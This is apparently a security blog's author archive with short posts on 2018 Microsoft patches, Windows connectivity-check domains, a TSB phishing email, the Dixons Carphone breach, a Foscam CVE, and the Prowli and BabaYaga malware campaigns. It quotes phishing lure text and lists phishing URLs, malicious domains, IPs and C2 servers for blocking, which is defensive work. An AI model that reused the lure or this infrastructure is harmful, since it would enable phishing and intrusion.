Author Archives: Duncan Newell

About Duncan Newell

Duncan is a technology professional with over 20 years experience of working in various IT roles. He also has a wide range of other skills in radio, electronics and telecommunications.

Microsoft Patch Tuesday – June 2018

Microsoft has released its monthly security advisories for vulnerabilities that have been identified and addressed in various Microsoft products. This month’s advisory release addresses 50 flaws, with 11 of them rated “critical,” and 39 rated “important.” These vulnerabilities impact Microsoft Edge, Internet Explorer, Chakra Scripting Engine, Windows DNSAPI, Microsoft Office, Windows Kernel and more.

In addition to the 50 vulnerabilities referenced above, Microsoft has also released a critical update advisory, ADV180014, the June 2018 Adobe Flash Security Update, which addresses the vulnerabilities described in the security bulletin.

Critical Vulnerabilities

This month, Microsoft is addressing 11 vulnerabilities that are rated “critical.” Talos believes these three vulnerabilities in particular are notable and require prompt attention.

CVE-2018-8225 – Windows DNSAPI Remote Code Execution Vulnerability

A remote code vulnerability is present within Windows DNS. This vulnerability manifests due to DNSAPI.dll improperly handling DNS responses. This vulnerability could allow a remote attacker to execute arbitrary code within the context of the LocalSystem account on affected systems. An attacker could leverage a malicious DNS server and send specially crafted DNS responses to trigger this vulnerability.

CVE-2018-8229 – Chakra Scripting Engine Memory Corruption Vulnerability

A remote code execution vulnerability is present within Microsoft Scripting Engine. This vulnerability manifests due to the Chakra engine improperly handling objects in memory. This vulnerability could be leveraged by attackers to execute arbitrary code on affected systems within the context of the current user. This vulnerability could be leveraged in web-based attacks where a user is convinced to visit a web page that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker controlled webpage, or simply a page that hosts external content, such as advertisements.

CVE-2018-8267 – Scripting Engine Memory Corruption Vulnerability

A remote code execution vulnerability is present within Microsoft Scripting Engine. THis vulnerability manifests due to scripting engine not properly handling objects in memory in Internet Explorer. This vulnerability could be leveraged by attackers to execute arbitrary code on affected systems within the context of the current user. This vulnerability was publicly disclosed prior to a patch being made available.

Other vulnerabilities deemed “critical” are listed below:

Important vulnerabilities

This month, Microsoft is addressing 39 vulnerabilities that are rated “important.” One of these vulnerabilities is TALOS-2018-0545, which was assigned CVE-2018-8210. This vulnerability is a Windows remote code execution flaw that was discovered by Marcin Noga of Cisco Talos. Additional information related to this vulnerability can be found in the advisory report here.

Additionally, Talos believes the following vulnerability is notable and requires prompt attention.

CVE-2018-8227 – Chakra Scripting Engine Memory Corruption Vulnerability

A remote code execution vulnerability is present within the Microsoft Scripting Engine. This vulnerability manifests due to the Chakra engine improperly handling objects in memory. This vulnerability could be leveraged by attackers to execute arbitrary code on affected systems within the context of the current user. This vulnerability could be leveraged in web-based attacks where a user is convinced to visit a web page that has been specially crafted to exploit this vulnerability. This could be in the form of an attacker controlled webpage, or simply a page that hosts external content, such as advertisements.

Other vulnerabilities deemed “important” are listed below:





Duncan is a technology professional with over 20 years experience of working in various IT roles. He also has a wide range of other skills in radio, electronics and telecommunications.

What Is msftconnecttest.com ?

You have found this web page because you want to know what the domain msftconnecttest.com is and who owns it.

We can confirm this URL is used by Microsoft Windows 10 and above to test if you have a working internet connection.

Windows has an internal component for network connectivity changes detection called “Network Connectivity Status Indicator” (NCSI as known). This component, among other tasks, performs a background testing to determine if the machine has Internet connectivity, engages his brother, the Network Location Awareness (or NLA), to identify if it’s in a domain or a public network to define the proper firewall profile, etc.

There is two URL’s associated to connectivity checks they are msftconnecttest.com and msftncsi.com



Duncan is a technology professional with over 20 years experience of working in various IT roles. He also has a wide range of other skills in radio, electronics and telecommunications.

Fake TSB Account Emails

There is a lot of fake TSB e-mails going around at the moment, here is the details for just one we received today.  We had two of these e-mails two hours apart from each other and they ended up in our inbox, and we have good spam protection so a lot of work has gone into this email to bypass spam filters on e-mail.   There is no obvious spelling or grammar errors on this e-mail.

On our e-mail the subject was TSB and the from address was [email protected] and the link they wanted you to click was iiinin.com/sign-in.php this then took you to another URL on the domain wlengineering.co.za with a fake login page, the aim of this is to get your login details.

The text of the e-mail said ” Due to several failed attempts to access your online Account . We temporarily de-activated your account access. To your Protection you have to Verify Your Identity . To confirm your account

Fake TSB login page




Fake TSB email

Duncan is a technology professional with over 20 years experience of working in various IT roles. He also has a wide range of other skills in radio, electronics and telecommunications.

What Is msftncsi.com ?

You have found this web page because you want to know what the domain msftncsi.com is and who owns it.

We can confirm this URL is used by Windows 8.1 and earlier to test if you have a working internet connection.

Windows has an internal component for network connectivity changes detection called “Network Connectivity Status Indicator” (NCSI as known). This component, among other tasks, performs a background testing to determine if the machine has Internet connectivity, engages his brother, the Network Location Awareness (or NLA), to identify if it’s in a domain or a public network to define the proper firewall profile, etc.

There is two URL’s associated to connectivity checks they are msftconnecttest.com and msftncsi.com




Duncan is a technology professional with over 20 years experience of working in various IT roles. He also has a wide range of other skills in radio, electronics and telecommunications.

Hackers Access Almost 6 Million Bank Card Details At Dixons Carphone

Dixons Carphone has said that it has been the victim of an “unauthorised data access” in which millions of customer bank card details were targeted over the past 12 months.

The company believed there were attempts since last July – only discovered over the past week – to compromise 5.9 million cards in one of its processing systems for Currys PC World and Dixons Travel stores.

Dixons Carphone Warehouse says there has been no evidence of fraud as a result of the hack, but there are a few general tips below if you’re worried:

  • Regularly check your accounts. It’s good practice to regularly keep an eye on your bank accounts and credit card statements. If you spot anything unusual contact your provider immediately.
  • Watch out for scams. Be alert and watch out for potential scam emails or calls – don’t simply assume they are genuine even if they look believable.
  • Change your password. Dixons Carphone Warehouse doesn’t think any passwords were taken, but if you’re worried change your password, and change it on other sites where you have used the same one.

In a statement the company said :-

As part of a review of our systems and data, we have determined that there has been unauthorised access to certain data held by the company. We promptly launched an investigation, engaged leading cyber security  experts and added extra security measures to our systems. We have taken action to close off this access and have no evidence it is continuing. We have no evidence to date of any fraudulent use of the data as result of these incidents. We have also informed the relevant authorities including the ICO, FCA and the police.

Our investigation is ongoing and currently indicates that there was an attempt to compromise 5.9 million cards in one of the processing systems of Currys PC World and Dixons Travel stores. However, 5.8m of these cards have chip and pin protection. The data accessed in respect of these cards contains neither pin codes, card verification values (CVV) nor any authentication data enabling cardholder identification or a purchase to be made. Approximately 105,000 non-EU issued payment cards which do not have chip and pin protection have been compromised. As a precaution we immediately notified the relevant card companies via our payment
provider about all these cards so that they could take the appropriate measures to protect customers. We have no evidence of any fraud on these cards as a result of this incident.

Separately, our investigation has also found that 1.2m records containing non-financial personal data, such as name, address or email address, have been accessed. We have no evidence that this information has left our systems or has resulted in any fraud at this stage. We are contacting those whose non-financial personal data was accessed to inform them, to apologise, and to give them advice on any protective steps they should take.

Dixons Carphone Chief Executive, Alex Baldock, said:
“We are extremely disappointed and sorry for any upset this may cause. The protection of our data has to be at the heart of our business, and we’ve fallen short here. We’ve taken action to close off this unauthorised access and though we have currently no evidence of fraud as a result of these incidents, we are taking this extremely seriously. We are determined to put this right and are taking steps to do so; we promptly launched an investigation, engaged leading cyber security experts, added extra security measures to our systems and will be communicating directly with those affected. Cyber crime is a continual battle for business today and we are determined to tackle this fast-changing challenge.”




Duncan is a technology professional with over 20 years experience of working in various IT roles. He also has a wide range of other skills in radio, electronics and telecommunications.

Foscam Camera Web Management Vulnerability (CVE-2018-6830)

Multiple Foscam Camera could allow a remote attacker to delete arbitrary files from the system, caused by a flaw in the Web management interface. By sending a specially-crafted HTTP GET request, An attacker could exploit this vulnerability to delete arbitrary files from the system.

Affected products :-

Foscam FI9800P V3 2.82.2.33
Foscam FI9803P V4 2.84.2.33
Foscam FI9816P V3 2.81.2.33
Foscam FI9821EP V2 2.81.2.33
Foscam FI9821P V3 2.81.2.33
Foscam FI9826P V3 2.81.2.33
Foscam FI9831P V3 2.81.2.33

No remedy available as of June 6th 2018.




Duncan is a technology professional with over 20 years experience of working in various IT roles. He also has a wide range of other skills in radio, electronics and telecommunications.

Operation Prowli Malware

An advanced malware campaign known as Operation Prowli has been observed targeting a variety of systems worldwide. Vulnerable platforms include content management systems (CMS), IoT devices and modems; with financial, industrial and governmental organisations affected worldwide.

The attackers behind Operation Prowli are focused on making money from their efforts rather than ideology or espionage.  The first source of revenue comes from cryptocurrency mining. Typically, cryptocurrency mining is considered a resource-heavy operation that involves a large upfront investment followed by ongoing traffic and energy costs. The attackers behind Prowli incur no expenses when they use r2r2 to take over computers owned by others and use mining pools to launder their gains.

Second source of revenue is traffic monetization fraud. Traffic monetizers, such as roi777, buy traffic from “website operators” such as the Prowli attackers and redirect it to domains on demand. Website “operators” earn money per traffic sent through roi777. The destination domains frequently host different scams, such as fake services, malicious browser extensions and more.




The attackers behind Operation Prowli use a wide variety of bespoke malware tools and exploits to compromise systems. A worm called r2r2 is used to scan for systems with publicly reachable SSH ports and performs brute-force attack against them to gain access. It will then download and install a variant of the XMRig cryptocurrency miner before scanning for new targets.

Manual attacks are performed against CMS servers with the intention of re-purposing them to serve malicious files to users. Different payloads are delivered depending on the type of device visiting the compromised websites. Affected servers will also be used in malvertising, SEO fraud and traffic redistribution campaigns.

Further details regaing this can be found here – https://www.guardicore.com/2018/06/operation-prowli-traffic-manipulation-cryptocurrency-mining/

Domain’s / IP’s To Block

startreceive[.]tk

stats.startreceive[.]tk (traffic redirection)

wp.startreceive[.]tk (C&C)

roi777.com

minexmr.com

185.212.128.154



Duncan is a technology professional with over 20 years experience of working in various IT roles. He also has a wide range of other skills in radio, electronics and telecommunications.

How To Update Windows 10

Windows 10 periodically checks for updates so you don’t have to. When an update is available, it’s automatically downloaded and installed, keeping your device up to date with the latest features.

Check Manually For Windows 10 Updates

To check for updates manually, select the Start button, and then go to Settings > Update & security > Windows Update, and select Check for updates. If Windows Update says your device is up to date, you have all the updates that are currently available.





Duncan is a technology professional with over 20 years experience of working in various IT roles. He also has a wide range of other skills in radio, electronics and telecommunications.

Bootloader Protection Bypass Discovered On OnePlus 6

Jason Donenfeld, president of Edge Security LLC, also known on XDA as zx2c4, has discovered a vulnerability on the OnePlus 6 that allows you to boot any arbitrary modified image that bypasses bootloader protection measures (such as a locked bootloader).

Exploiting this vulnerability requires physical access to the device.


This vulnerability allows an attacker with physical access and a tethered connection to a PC to take control of the device. If the boot image is modified with insecure ADB and ADB as root by default, then an attacker with physical access will have total control over the device.

In a statement, OnePlus says:

We take security seriously at OnePlus. We are in contact with the security researcher, and a software update will be rolling out shortly.

Story via – https://www.xda-developers.com




Duncan is a technology professional with over 20 years experience of working in various IT roles. He also has a wide range of other skills in radio, electronics and telecommunications.

BabaYaga The New Russian WordPress Malware Used For SEO Spam

Security researchers have discovered a new malware strain targeting WordPress sites that includes some pretty clever techniques, such as removing competing malware and updating the victim’s site.

Known as BabaYaga, this malware strain isn’t new, but recent updates have transformed this former low-key player into a considerable foe for WordPress site administrators.

The virus itself is presented in two parts, one appears as spam ads on the affected site, and for the second attackers have full control over the infected page.

The malware is controlled by a central command and control server (C2 server) which
allows the attacker to control thousands of sites and use them to generate affiliate
revenue. This malware variant even goes to the trouble of reporting back to the C2 server
how many pages an infected site has indexed by Google, Bing, Yahoo and Yandex, to
determine the SEO value of an infected site.

The malware can access a certain URL on the C2 server and retrieve the newest variant
of itself. Once it has downloaded the code, the malware runs a function to randomize
variable and function names in order to avoid detection and overwrites itself with the new
code.

The malware appears to be Russian in origin. When its configuration file is decoded, at least one of the array keys is a transliteration of a Russian word for “backlink”. Many of the domains on the command and control servers are .ru domains. Some of the core domains are registered to an email address @yandex.ru

For a full detailed description of this malware click here

Command And Control Servers

7od.info (178.132.0.105)
my.wpssi.com (89.38.98.31)




Duncan is a technology professional with over 20 years experience of working in various IT roles. He also has a wide range of other skills in radio, electronics and telecommunications.